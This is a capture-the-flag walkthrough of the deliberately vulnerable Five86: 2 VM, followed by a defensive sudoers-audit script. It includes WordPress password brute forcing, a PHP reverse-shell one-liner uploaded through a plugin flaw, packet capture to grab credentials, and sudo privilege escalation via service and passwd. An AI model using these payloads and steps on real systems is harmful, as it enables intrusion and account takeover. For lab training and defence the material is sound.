five86 2 walkthrough vulnhub ctf

Five86: 2 Walkthrough Vulnhub CTF Writeup

Five86:-2 Download Link

Today we are solving five86: 2, created by DCAUC. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

Every time, our first step is finding the target IP address using any tool. Today we are using netdiscover.


Next, an Nmap aggressive scan of all ports and services. We see that the target machine has port 22 (SSH) open and a WordPress service running on port 80 (HTTP).

nmap -A


Enumerating the HTTP service on port 80: we already saw in the Nmap scan that the target machine is running WordPress.

We go to the wp-login page and see a WordPress URL error. To fix the error, I add the hostname five86-2 to our hosts file; this is the hostname we already see in the URL error.

vi /etc/hosts
# add a line mapping the target IP address to the hostname five86-2

After adding the target machine's hostname to our hosts file, I run wpscan, the most popular tool for WordPress (the -e u parameter enumerates all WordPress users).

wpscan --url http://five86-2 -e u

After the scan completes, the wpscan output shows 5 user entries:

  1. admin
  2. gillian
  3. peter
  4. barney
  5. stephen

I have already created a user.txt file and added every user we found with wpscan.

Our next step is a password brute-force attack against the 5 users (the -U parameter is the path to our user list file and the -P parameter is the password wordlist file).

wpscan --url http://five86-2 -U user.txt -P /usr/share/wordlists/rockyou.txt

After completing the password Brute-Force attack we found two usernames and passwords.

  • Username: barney
  • Password: spooky1
  • Username: stephen
  • Password: apollo1

After logging in to WordPress, I go to the Plugins section and we see three plugins. After searching exploit-db for every plugin version, I found a vulnerable plugin: Insert or Embed Articulate Content into WordPress – Remote Code Execution.

I create a simple PHP one-liner reverse shell and save it as shell.php, then create another file, index.html, and compress them into a zip file.

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ 0>&1'");

I click the Posts button and we see the default WordPress "Hello world!" post. I go to the edit section, click the plus button and insert an e-Learning block.

After uploading our file, we see its directory in the e-Learning block.

Now, before opening our file, we start our Netcat listener and then open the shell.php directory.

We get a Netcat reverse connection from the target system.

nc -lvp 1234
cd /home

Privilege Escalation

I go to the target's home directory and look at all the usernames. I find a user stephen, whose password we already found with wpscan. Now we change the shell from www-data to stephen's shell.

  • su stephen
  • Password: apollo1

After changing the user we see a blank shell, so we use python3 to spawn a proper shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'

The id command shows the user ID, group ID and other IDs.

The ip add command shows all interface names on our target machine.

ip add

Changing our directory to user stephen's directory, I dump all TCP packets on the target machine and save them to a hacknos.pcap file.

cd stephen
timeout 120 tcpdump -w hacknos.pcap -i veth2c37c59

After the tcpdump process completes, I open the file and see an FTP username and password.

tcpdump -r hacknos.pcap |more

We change our user using the FTP username paul and password esomepasswford.

  • su paul
  • Password: esomepasswford

The sudo -l command shows the user's entries in the sudoers file, and I see that we can run the tool /usr/sbin/service as user peter without being asked for a password.

sudo -l

I searched Google and found a privilege escalation for service. I run the command and our shell changes from paul to peter.

sudo -u peter /usr/sbin/service ../../bin/bash
sudo -l

Running sudo -l again to see the sudoers entries, we see that user peter can run the passwd command as root without being asked for a password. I change the root password and switch from the normal user to a root user shell.

sudo -u root passwd root
  • New password: toor
  • Retype new password: toor
  • su root
  • Password: toor
cd /root

In the target's root directory we see our root flag.

cat thisistheflag.txt
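
The two sudo steps above (service run as peter, passwd run as root) are sudoers entries that a review of `sudo -l` output can catch before anyone chains them. The following is an added example, not part of the original walkthrough: a small audit that flags such entries. The sample listings, the passwd path and the `ops` user are constructed assumptions.

```python
import os
import re

# Commands seen in this walkthrough that hand over a shell or credentials when
# a sudoers entry allows them with no argument restriction.
RISKY = {
    "service": "service name is used as a path, so ../../bin/bash runs a shell",
    "passwd": "can set any account's password, including root's",
}
HEADER = re.compile(r"^User (\S+) may run the following commands")
ENTRY = re.compile(r"^\s+\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")

def audit_sudo_listing(text):
    """Return (user, run_as, command, reason) for each risky `sudo -l` entry."""
    findings, user = [], None
    for line in text.splitlines():
        header = HEADER.match(line)
        if header:
            user = header.group(1)
            continue
        entry = ENTRY.match(line)
        if not (user and entry):
            continue
        run_as, _tags, commands = entry.groups()
        # Simplification: commas inside arguments (escaped as "\,") are not handled.
        for command in filter(None, map(str.strip, commands.split(","))):
            binary, *args = command.split()
            name = os.path.basename(binary)
            if binary == "ALL":
                findings.append((user, run_as, command, "unrestricted command set"))
            elif name in RISKY and (not args or any("*" in a for a in args)):
                # No arguments in sudoers means the caller may pass any arguments.
                findings.append((user, run_as, command, RISKY[name]))
    return findings

# Constructed `sudo -l` listings modelled on the two steps above; the passwd
# path and the hardened entry for "ops" are assumptions, not lab output.
SAMPLE = """\
User paul may run the following commands on five86-2:
    (peter) NOPASSWD: /usr/sbin/service
User peter may run the following commands on five86-2:
    (root) NOPASSWD: /usr/bin/passwd
User ops may run the following commands on five86-2:
    (root) NOPASSWD: /usr/sbin/service apache2 restart
"""

if __name__ == "__main__":
    for finding in audit_sudo_listing(SAMPLE):
        print("RISKY: %s as %s -> %s (%s)" % finding)
```

The `ops` entry is not flagged because sudoers only permits the exact arguments listed, which is the fix for the first two entries.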


About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.
